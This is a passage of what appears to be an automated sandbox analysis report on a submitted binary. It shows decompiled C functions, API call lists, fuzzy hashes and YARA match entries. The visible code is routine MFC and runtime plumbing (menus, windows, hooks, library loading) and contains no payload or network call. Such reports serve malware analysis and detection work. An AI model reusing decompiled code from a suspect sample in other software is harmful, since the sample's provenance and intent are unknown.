      				_t12 = E009A6C6C( *((intOrPtr*)(_t67 + 0xe4)) - 0x10) + 0x10; // 0x10
      				_t52 = _t12;
      				 *((intOrPtr*)(_t70 - 0x14)) = _t52;
      				_push( *((intOrPtr*)(_t70 + 0x14)));
      				_push(0);
      				_t65 = _t64 & 0x0000ffff;
      				_push(_t64 & 0x0000ffff);
      				_push( *((intOrPtr*)(_t70 + 0x10)));
      				_push(0xd07d70);
      				_push( *((intOrPtr*)(_t70 + 0xc)));
      				 *(_t70 - 4) = 1;
      				_push(_t52);
      				_push( *((intOrPtr*)(_t70 - 0x10)));
      				if( *((intOrPtr*)( *_t67 + 0x160))() != 0) {
      					__eflags =  *((intOrPtr*)(_t67 + 0xf4)) - 1;
      					if(__eflags != 0) {
      						_t40 =  *(_t67 + 0xf8);
      					} else {
      						_t40 = GetMenu( *(_t67 + 0x20));
      					}
      					_t58 = _t67;
      					 *(_t67 + 0x7c) = _t40;
      					E009A6CCC(_t67, __eflags, _t65);
      					__eflags =  *((intOrPtr*)(_t70 + 0x14));
      					if( *((intOrPtr*)(_t70 + 0x14)) == 0) {
      						E009AD893(_t52, _t58, _t62,  *(_t67 + 0x20), 0x364, 0, 0, 1, 1);
      					}
      					_t69 = 1;
      				} else {
      					_t69 = 0;
      				}
      				_t20 = _t52 - 0x10; // 0x0
      				E009A5510(_t20, _t62);
      				E009A5510( *(_t70 + 8) + 0xfffffff0, _t62);
      				return E00AAD30A(_t69);
      			}
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3Menu
      • String ID:
      • API String ID: 3706238695-0
      • Opcode ID: badd85872d8b1b6197697d97c3df53125e276502a3892252314d638c70ecc4f1
      • Instruction ID: 3f9dafae764ec1d56de04c8e7aa271213f0086cf8f6e2b15c6c9a9f971e18535
      • Opcode Fuzzy Hash: badd85872d8b1b6197697d97c3df53125e276502a3892252314d638c70ecc4f1
      • Instruction Fuzzy Hash: 6F319C30600204ABCF25AF60CD45FAF7BB8FF86710F004819F996AB2D1DB719900CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 96%
      			E009A950A(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
      				struct HMENU__* _v8;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				intOrPtr _t28;
      				intOrPtr* _t30;
      				intOrPtr _t33;
      				intOrPtr _t35;
      				struct HMENU__* _t39;
      				void* _t42;
      				intOrPtr _t48;
      				void* _t51;
      				intOrPtr _t52;
      				intOrPtr* _t58;
      
      				_t51 = __edx;
      				_t42 = __ebx;
      				_push(__ecx);
      				_t58 = __ecx;
      				_v8 = 0;
      				_t60 = _a24;
      				if(_a24 == 0) {
      					L4:
      					E009A6000(_t51, 0, _a8);
      					_t28 = _a20;
      					__eflags = _t28;
      					if(_t28 != 0) {
      						_a24 =  *((intOrPtr*)(_t28 + 0x20));
      					} else {
      						_a24 = 0;
      					}
      					_t30 = _a16;
      					_t48 =  *((intOrPtr*)(_t30 + 4));
      					_t52 =  *_t30;
      					_t33 =  *((intOrPtr*)( *_t58 + 0x5c))(_a28, _a4, _a8, _a12, _t52, _t48,  *((intOrPtr*)(_t30 + 8)) - _t52,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
      					__eflags = _t33;
      					if(_t33 != 0) {
      						_t35 = 1;
      						__eflags = 1;
      						goto L11;
      					} else {
      						__eflags = _v8 - _t33;
      						if(_v8 != _t33) {
      							DestroyMenu(_v8);
      						}
      						L3:
      						_t35 = 0;
      						L11:
      						return _t35;
      					}
      				}
      				_t39 = LoadMenuA( *(E009BD77F(__ebx, 0, __ecx, _t60) + 0xc), _a24); // executed
      				_v8 = _t39;
      				if(_t39 != 0) {
      					goto L4;
      				}
      				 *((intOrPtr*)( *_t58 + 0x120))();
      				goto L3;
      			}
      APIs
      • LoadMenuA.USER32 ref: 009A952A
      • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 009A95A5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Menu$DestroyLoad
      • String ID:
      • API String ID: 588275208-0
      • Opcode ID: 185c19a3b9f80282d6b5a520c40f1048dff05faa5d228711c70e6b6c82bee5ba
      • Instruction ID: d3ed96a611804a053a65f33101966a502a5e6e6fd2e4df920732394d919c1114
      • Opcode Fuzzy Hash: 185c19a3b9f80282d6b5a520c40f1048dff05faa5d228711c70e6b6c82bee5ba
      • Instruction Fuzzy Hash: F4213875A00109EFCF02CFA4C9499AA7BBAFF89350B158465FC1A97221D631DD11DF90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Yara matches
      Similarity
      • API ID: _memmove_s
      • String ID:
      • API String ID: 800865076-0
      • Opcode ID: 899305a09f2aaaa60e55b22c885d172a88485a877e9f2e2e6f32a9f4ee571c15
      • Instruction ID: 5cd7f3749e19854f0809e7acb536cfe29aa11efa7beec5055659a4a9dfcdd342
      • Opcode Fuzzy Hash: 899305a09f2aaaa60e55b22c885d172a88485a877e9f2e2e6f32a9f4ee571c15
      • Instruction Fuzzy Hash: 77110132701914AFDB04EF5CDD88F6EB7D9EF8A320B12815AF8049F219C630AC408BD0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A19D0(void* __ecx, void* __eflags) {
      				intOrPtr _v8;
      				char _v12;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				intOrPtr* _t20;
      				intOrPtr _t21;
      				intOrPtr _t24;
      				void* _t25;
      				intOrPtr* _t27;
      				intOrPtr _t30;
      				void* _t32;
      				void* _t34;
      				void* _t37;
      
      				_t37 = __eflags;
      				_t34 = __ecx;
      				 *((intOrPtr*)(__ecx + 0x30)) = 0;
      				 *((intOrPtr*)(__ecx + 8)) = 0;
      				 *((intOrPtr*)(__ecx + 0x10)) = 0;
      				 *((intOrPtr*)(__ecx + 0x14)) = 0x201;
      				 *((intOrPtr*)(__ecx + 0x18)) = 6;
      				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
      				 *((intOrPtr*)(__ecx + 0x20)) = 0;
      				 *((intOrPtr*)(__ecx + 0x24)) = 0;
      				 *((intOrPtr*)(__ecx + 0x28)) = 0;
      				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
      				E009A18A0(__ecx, 0, 0);
      				_t20 = E009A6291(_t37, 4);
      				_t27 = _t20;
      				_t38 = _t27;
      				if(_t27 == 0) {
      					 *((intOrPtr*)(_t34 + 0x30)) = 0;
      					return _t20;
      				} else {
      					_t21 = E00AC5DF9(_t27, _t32, 0, _t34, _t38); // executed
      					 *_t27 = _t21;
      					_v8 = E00AC5BB8();
      					E00AC5AED( &_v12, 0);
      					_t30 = _v8;
      					_t24 =  *((intOrPtr*)(_t30 + 4));
      					if(_t24 < 0xffffffff) {
      						 *((intOrPtr*)(_t30 + 4)) = _t24 + 1;
      					}
      					_t25 = E00AC5B15( &_v12);
      					 *((intOrPtr*)(_t34 + 0x30)) = _t27;
      					return _t25;
      				}
      			}


      APIs
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A18C4
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A18E8
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A1903
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A1922
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A193D
        • Part of subcall function 009A18A0: std::exception::exception.LIBCMT ref: 009A1957
        • Part of subcall function 009A18A0: __CxxThrowException@8.LIBCMT ref: 009A1972
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • std::locale::_Init.LIBCPMT ref: 009A1A1A
        • Part of subcall function 00AC5DF9: __EH_prolog3.LIBCMT ref: 00AC5E00
        • Part of subcall function 00AC5DF9: std::_Lockit::_Lockit.LIBCPMT ref: 00AC5E16
        • Part of subcall function 00AC5DF9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AC5E38
        • Part of subcall function 00AC5DF9: std::locale::_Setgloballocale.LIBCPMT ref: 00AC5E42
        • Part of subcall function 00AC5DF9: _Yarn.LIBCPMT ref: 00AC5E58
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A1A2D
      Yara matches
      Similarity
      • API ID: Exception@8Throw$std::exception::exceptionstd::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
      • String ID:
      • API String ID: 353226162-0
      • Opcode ID: b41ac85784164fafa2ba71051aa93f12f6736699d303da25341d44fb00076347
      • Instruction ID: 50467cf807bfc864f34efc7416b2b55437a62a62dd19c9c45e19b00b089fc756
      • Opcode Fuzzy Hash: b41ac85784164fafa2ba71051aa93f12f6736699d303da25341d44fb00076347
      • Instruction Fuzzy Hash: 4A114CB19007049BC7209FAAD585A5AFBF8FF91320B10066FE85A83651D7B1B9458A91
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E009A70AD(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4, signed short _a8) {
      				intOrPtr _v16;
      				intOrPtr _v20;
      				intOrPtr _v24;
      				char _v44;
      				intOrPtr _v52;
      				intOrPtr _v60;
      				char _v92;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct HICON__* _t18;
      				void* _t25;
      				void* _t35;
      				struct HICON__* _t36;
      				intOrPtr* _t37;
      
      				_t37 = __ecx;
      				_t18 = LoadIconW( *(E009BD77F(__ebx, _t35, __ecx, __eflags) + 0xc), _a8 & 0x0000ffff); // executed
      				_t36 = _t18;
      				if(_t36 == 0) {
      					L5:
      					__eflags = 0;
      					return 0;
      				}
      				E00AAB3F0( &_v92, 0, 0x30);
      				_v60 = _a4;
      				 *((intOrPtr*)( *_t37 + 0x64))( &_v92);
      				_t43 = _v52;
      				if(_v52 == 0) {
      					goto L5;
      				}
      				_t25 = E009BD77F(__ebx, _t36, _t37, _t43);
      				_push( &_v44);
      				_push(_v52);
      				_push( *((intOrPtr*)(_t25 + 8)));
      				if(E009A6ACA( &_v44, _t37, _t43) == 0) {
      					goto L5;
      				}
      				_t45 = _v24 - _t36;
      				if(_v24 == _t36) {
      					goto L5;
      				}
      				return E009AFC32( &_v44, _t45, _v44, _v20, _v16, _t36);
      			}


      APIs
      • LoadIconW.USER32(?,?), ref: 009A70C7
      • _memset.LIBCMT ref: 009A70DB
        • Part of subcall function 009A6ACA: ActivateActCtx.KERNEL32(?,00000030,00B0B708,00000010,009AFBC2,?,?,?,00000030,009AFF00,?,?,009B0017,?,AfxFrameOrView100s,00007A02), ref: 009A6AEA
        • Part of subcall function 009AFC32: __snwprintf_s.LIBCMT ref: 009AFC7D
      Yara matches
      Similarity
      • API ID: ActivateIconLoad__snwprintf_s_memset
      • String ID:
      • API String ID: 4120747014-0
      • Opcode ID: 15d0f76c5136660d3f1e4cb429f35a47675c0438284871d2fc580fad8e98b578
      • Instruction ID: 8414e9420607638457b04fa168f0939d1f1d97d7f92a7d4a72df69f73336b680
      • Opcode Fuzzy Hash: 15d0f76c5136660d3f1e4cb429f35a47675c0438284871d2fc580fad8e98b578
      • Instruction Fuzzy Hash: 8C118E72904108ABCB10ABE8DC4AEEEFBF9EF89314F140025F900A7151EB70D945CBE0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 009B333D: RegCloseKey.KERNELBASE(?), ref: 009B33E2
        • Part of subcall function 009B333D: RegCloseKey.ADVAPI32(?), ref: 009B33EC
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3443
      Yara matches
      Similarity
      • API ID: Close
      • String ID:
      • API String ID: 3535843008-0
      • Opcode ID: 1b948344179fbf947ba7e585ada3dee68d8ed923f4ac769cfaf578dd6fc2c29c
      • Instruction ID: ec5e31be41cc2b5d50f4f3da25b6855958e3a4bd00dfc41987fcaf0c88c81f2d
      • Opcode Fuzzy Hash: 1b948344179fbf947ba7e585ada3dee68d8ed923f4ac769cfaf578dd6fc2c29c
      • Instruction Fuzzy Hash: 82F01D76501028FB8B22DB91DD49CEF7F6DEF89BB0750C026F90696111DA749B01DBB1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E009AB5AF(void* __ecx, void* __esi, void* __eflags) {
      				void* _t23;
      				struct HWND__* _t24;
      				struct HWND__* _t26;
      				void* _t28;
      				void* _t30;
      				void* _t33;
      				void* _t34;
      
      				_t34 = __eflags;
      				E00AAD340(_t28, _t30, __esi);
      				 *((intOrPtr*)(_t33 - 0x20)) = 0;
      				_t23 = E009BD77F(_t28, _t30, 0, _t34);
      				__imp__ActivateActCtx( *((intOrPtr*)(_t23 + 0x80)), _t33 - 0x20, 0xb0bab0, 0x10);
      				 *(_t33 - 0x1c) = 0;
      				if(_t23 != 0) {
      					 *((intOrPtr*)(_t33 - 4)) = 0;
      					_t24 = CreateWindowExA( *(_t33 + 8),  *(_t33 + 0xc),  *(_t33 + 0x10),  *(_t33 + 0x14),  *(_t33 + 0x18),  *(_t33 + 0x1c),  *(_t33 + 0x20),  *(_t33 + 0x24),  *(_t33 + 0x28),  *(_t33 + 0x2c),  *(_t33 + 0x30),  *(_t33 + 0x34)); // executed
      					 *(_t33 - 0x1c) = _t24;
      					 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
      					E009AB625();
      					_t26 =  *(_t33 - 0x1c);
      				} else {
      					_t26 = 0;
      				}
      				return E00AAD385(_t26);
      			}


      APIs
      • ActivateActCtx.KERNEL32(?,?,00B0BAB0,00000010), ref: 009AB5CF
      • CreateWindowExA.USER32 ref: 009AB607
      Yara matches
      Similarity
      • API ID: ActivateCreateWindow
      • String ID:
      • API String ID: 2169890993-0
      • Opcode ID: da3c8604e3aaf8819b944acfe85d906a696595707dc3ae95077930c1efeda4d8
      • Instruction ID: c893e6dd54845434655271c059de19061985c7fd9408d149fb335ba068ef919d
      • Opcode Fuzzy Hash: da3c8604e3aaf8819b944acfe85d906a696595707dc3ae95077930c1efeda4d8
      • Instruction Fuzzy Hash: 3B01C072801219AFCF12AFE0CE059DD7F72BF0C750F008515FA15A6161C7368561AF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 89%
      			E00AAC8B2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t20;
      				signed int _t22;
      				intOrPtr _t32;
      				void* _t33;
      				intOrPtr _t35;
      
      				_push(0xc);
      				_push(0xb193f8);
      				E00AAD340(__ebx, __edi, __esi);
      				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
      				_t32 =  *((intOrPtr*)(_t33 + 8));
      				_t35 = _t32;
      				_t36 = _t35 != 0;
      				if(_t35 != 0) {
      					__eflags =  *(_t32 + 0xc) & 0x00000040;
      					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
      						E00AAC094(_t32);
      						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
      						_t20 = E00AAC845(__ebx, __edx, _t32); // executed
      						 *(_t33 - 0x1c) = _t20;
      						 *(_t33 - 4) = 0xfffffffe;
      						E00AAC91E(_t32);
      					} else {
      						_t9 = _t32 + 0xc;
      						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
      						__eflags =  *_t9;
      					}
      					_t22 =  *(_t33 - 0x1c);
      				} else {
      					 *((intOrPtr*)(E00AADB06(_t36))) = 0x16;
      					_t22 = E00AB4B8D() | 0xffffffff;
      				}
      				return E00AAD385(_t22);
      			}


      APIs
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • __lock_file.LIBCMT ref: 00AAC8F9
        • Part of subcall function 00AAC094: __lock.LIBCMT ref: 00AAC0B9
      • __fclose_nolock.LIBCMT ref: 00AAC904
      Yara matches
      Similarity
      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
      • String ID:
      • API String ID: 2800547568-0
      • Opcode ID: 53d10308c84e7d29fdb5c9e9921b91b518cdde3cba8e675dc54807008f7a2245
      • Instruction ID: 0bb3a6086b1480df75e9e4ba3e53c4d6f7ff8c11340c3e2e2fe24659a137d760
      • Opcode Fuzzy Hash: 53d10308c84e7d29fdb5c9e9921b91b518cdde3cba8e675dc54807008f7a2245
      • Instruction Fuzzy Hash: 08F0BB30801715DAEB20AB74C90679E7BA06F07334F108244A575EB0D1C77C89019BA6
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009AED3F(void* __ebx, void* __eflags, intOrPtr _a4) {
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				struct HHOOK__* _t6;
      				void* _t10;
      				intOrPtr _t11;
      				void* _t12;
      				struct HHOOK__* _t13;
      
      				_push(E009AB424);
      				_t6 = E009BCDBD(__ebx, 0xd0fd04, _t10, _t12, __eflags);
      				_t13 = _t6;
      				if(_t13 == 0) {
      					_t6 = E009B8782(0xd0fd04);
      				}
      				_t11 = _a4;
      				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
      					return _t6;
      				} else {
      					if( *(_t13 + 0x28) == 0) {
      						_t6 = SetWindowsHookExA(5, E009AEAF8, 0, GetCurrentThreadId()); // executed
      						 *(_t13 + 0x28) = _t6;
      						if(_t6 == 0) {
      							_t6 = E009B874A(0xd0fd04);
      						}
      					}
      					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
      					return _t6;
      				}
      			}


      APIs
        • Part of subcall function 009BCDBD: __EH_prolog3.LIBCMT ref: 009BCDC4
      • GetCurrentThreadId.KERNEL32 ref: 009AED6E
      • SetWindowsHookExA.USER32 ref: 009AED7E
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Yara matches
      Similarity
      • API ID: CurrentException@8H_prolog3HookThreadThrowWindows
      • String ID:
      • API String ID: 1226552664-0
      • Opcode ID: eb92dcd58b410441113a921fb02cdbc8f3a4770f0974ca416a14dba0ea836b02
      • Instruction ID: df3c05215550a13f32b58d94cd7fe15dc72aaf106a156d88aa596f759f600f12
      • Opcode Fuzzy Hash: eb92dcd58b410441113a921fb02cdbc8f3a4770f0974ca416a14dba0ea836b02
      • Instruction Fuzzy Hash: DAF0A035641701ABC730AB96AC15B5F7AACDBC6B76F14053AF6058AA81CF70D841C6F1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009AA646(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
      				_Unknown_base(*)()* _t11;
      				long _t12;
      				intOrPtr* _t17;
      
      				_t17 = __ecx;
      				_t11 =  *(__ecx + 0x5c);
      				if(_t11 != 0) {
      					L3:
      					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
      					return _t12;
      				}
      				_t11 =  *( *((intOrPtr*)( *__ecx + 0xfc))());
      				if(_t11 != 0) {
      					goto L3;
      				}
      				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
      			}


      APIs
      • DefWindowProcA.USER32(?,?,?,?), ref: 009AA66F
      • CallWindowProcA.USER32 ref: 009AA684
      Yara matches
      Similarity
      • API ID: ProcWindow$Call
      • String ID:
      • API String ID: 2316559721-0
      • Opcode ID: 6b87cdf9ba8c07465e608679a25e522fe017634e4675bae455e357c22a681dc6
      • Instruction ID: 2723b045e84b40a33f0b716a0b5024abcbb7a4b341726088ad839cdf926008b7
      • Opcode Fuzzy Hash: 6b87cdf9ba8c07465e608679a25e522fe017634e4675bae455e357c22a681dc6
      • Instruction Fuzzy Hash: 2EF01C36100209FFCF118FA5DC08DAA7BB9FF19350B088429F94A86530D732D820EF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E009AB76B(void* __ecx, void* __esi, void* __eflags) {
      				void* _t12;
      				struct HINSTANCE__* _t13;
      				struct HINSTANCE__* _t15;
      				void* _t17;
      				void* _t19;
      				void* _t22;
      				void* _t23;
      
      				_t23 = __eflags;
      				E00AAD340(_t17, _t19, __esi);
      				 *((intOrPtr*)(_t22 - 0x20)) = 0;
      				_t12 = E009BD77F(_t17, _t19, 0, _t23);
      				__imp__ActivateActCtx( *((intOrPtr*)(_t12 + 0x80)), _t22 - 0x20, 0xb0bb10, 0x10);
      				 *(_t22 - 0x1c) = 0;
      				if(_t12 != 0) {
      					 *((intOrPtr*)(_t22 - 4)) = 0;
      					_t13 = LoadLibraryW( *(_t22 + 8)); // executed
      					 *(_t22 - 0x1c) = _t13;
      					 *((intOrPtr*)(_t22 - 4)) = 0xfffffffe;
      					E009AB7C0();
      					_t15 =  *(_t22 - 0x1c);
      				} else {
      					_t15 = 0;
      				}
      				return E00AAD385(_t15);
      			}


      APIs
      • ActivateActCtx.KERNEL32(?,?,00B0BB10,00000010), ref: 009AB78B
      • LoadLibraryW.KERNELBASE(?), ref: 009AB7A2
      Yara matches
      Similarity
      • API ID: ActivateLibraryLoad
      • String ID:
      • API String ID: 389599620-0
      • Opcode ID: 0cd6115a8bee039e285df807a0b8a81187a856d69aa90b168b9fdc9c07e966c8
      • Instruction ID: 7ff5f418e7495208563de1c45953721b5a5b0620109f065693b883075fb9e125
      • Opcode Fuzzy Hash: 0cd6115a8bee039e285df807a0b8a81187a856d69aa90b168b9fdc9c07e966c8
      • Instruction Fuzzy Hash: 0BF01CB4D112189BCF10AFB0CE45A9DBBB4FF49710F504965E056E65A2C77445029FD0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E009B30E9(void* __esi, void* __eflags) {
      				void* _t3;
      				void* _t4;
      				struct HHOOK__* _t6;
      				void* _t7;
      				void* _t8;
      
      				_t3 = E009BD77F(_t7, _t8, __esi, __eflags);
      				_t13 =  *((char*)(_t3 + 0x14));
      				if( *((char*)(_t3 + 0x14)) == 0) {
      					_push(__esi);
      					_t4 = E009BD1B0(_t7, _t8, __esi, _t13);
      					_t6 = SetWindowsHookExA(0xffffffff, E009B2F4E, 0, GetCurrentThreadId()); // executed
      					 *(_t4 + 0x2c) = _t6;
      					return _t6;
      				}
      				return _t3;
      			}


      APIs
      Yara matches
      Similarity
      • API ID: CurrentHookThreadWindows
      • String ID:
      • API String ID: 1904029216-0
      • Opcode ID: 0ca769c6ba9af3b43792265ca7fc793abf63da66c17e1d4fe51e16891fa9a411
      • Instruction ID: 62c93bf890bc503217407a898861e74c51a616339361748ff5b60e1da356747f
      • Opcode Fuzzy Hash: 0ca769c6ba9af3b43792265ca7fc793abf63da66c17e1d4fe51e16891fa9a411
      • Instruction Fuzzy Hash: 5FD0A77180F2502ED720ABB46E09BD93B988B41330F040345F421551D2DA60854247D1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00AAC984(int _a4) {
      
      				E00AAC959(_a4);
      				ExitProcess(_a4);
      			}
      Instruction addresses:
      0x00aac98c 0x00aac995

      APIs
      • ___crtCorExitProcess.LIBCMT ref: 00AAC98C
        • Part of subcall function 00AAC959: GetModuleHandleW.KERNEL32(mscoree.dll,?,00AAC991,00000000,?,00AACFCA,000000FF,0000001E,00000001,00000000,00000000,?,00AB4D5B,00000000,00000001,00000000), ref: 00AAC963
        • Part of subcall function 00AAC959: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AAC973
      • ExitProcess.KERNEL32 ref: 00AAC995
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcess$AddressHandleModuleProc___crt
      • String ID:
      • API String ID: 2427264223-0
      • Opcode ID: 2504e58169eb95bffe8b523c26ef28f6b13e2f323837a54ec90fe1fab618cb3f
      • Instruction ID: 38116b1b45d8bd0068efbc6a3a4ccbe04b7271e72f6415e7332fec50890969bd
      • Opcode Fuzzy Hash: 2504e58169eb95bffe8b523c26ef28f6b13e2f323837a54ec90fe1fab618cb3f
      • Instruction Fuzzy Hash: 67B0923100010DBFEB012F52ED0A88A3F2AEB893A0B154025F8090A071DF72AD939AC0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 38%
      			E009AEEF6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t156;
      				signed int _t158;
      				signed int* _t161;
      				intOrPtr _t168;
      				intOrPtr* _t169;
      				signed int _t172;
      				signed int _t175;
      				signed int* _t179;
      				signed int* _t182;
      				signed int _t186;
      				signed int _t190;
      				signed int _t194;
      				signed int _t198;
      				signed int* _t203;
      				signed int _t204;
      				signed int _t205;
      				intOrPtr* _t206;
      				signed int _t207;
      				signed int _t222;
      				signed int _t226;
      				void* _t228;
      				unsigned int _t234;
      				void* _t235;
      
      				_t209 = __ecx;
      				_push(0x90);
      				E00AAD232(0xac8101, __ebx, __edi, __esi);
      				_t232 = __ecx;
      				 *((intOrPtr*)(_t235 - 0x10)) = 0;
      				 *((intOrPtr*)(_t235 - 0x14)) = 0x7fffffff;
      				_t198 =  *(_t235 + 8);
      				 *(_t235 - 4) = 0;
      				if(_t198 != 0x111) {
      					__eflags = _t198 - 0x4e;
      					if(_t198 != 0x4e) {
      						_t234 =  *(_t235 + 0x10);
      						__eflags = _t198 - 6;
      						if(_t198 == 6) {
      							E009AE8A1(_t209, _t232,  *((intOrPtr*)(_t235 + 0xc)), E009AC90B(_t198, __ecx, _t228, _t234));
      						}
      						__eflags = _t198 - 0x20;
      						if(_t198 != 0x20) {
      							L12:
      							_t156 =  *(_t232 + 0x68);
      							__eflags = _t156;
      							if(_t156 == 0) {
      								L20:
      								_t158 =  *((intOrPtr*)( *_t232 + 0x28))();
      								 *(_t235 + 0x10) = _t158;
      								E009AB812(_t235 - 0x14, _t234, 7);
      								_t203 = 0xd0e150 + ((_t158 ^  *(_t235 + 8)) & 0x000001ff) * 0xc;
      								 *(_t235 - 0x18) = _t203;
      								__eflags =  *(_t235 + 8) -  *_t203;
      								if( *(_t235 + 8) !=  *_t203) {
      									L25:
      									_t161 =  *(_t235 - 0x18);
      									_t204 =  *(_t235 + 0x10);
      									 *_t161 =  *(_t235 + 8);
      									_t161[2] = _t204;
      									while(1) {
      										__eflags =  *_t204;
      										if( *_t204 == 0) {
      											break;
      										}
      										__eflags =  *(_t235 + 8) - 0xc000;
      										_push(0);
      										_push(0);
      										if( *(_t235 + 8) >= 0xc000) {
      											_push(0xc000);
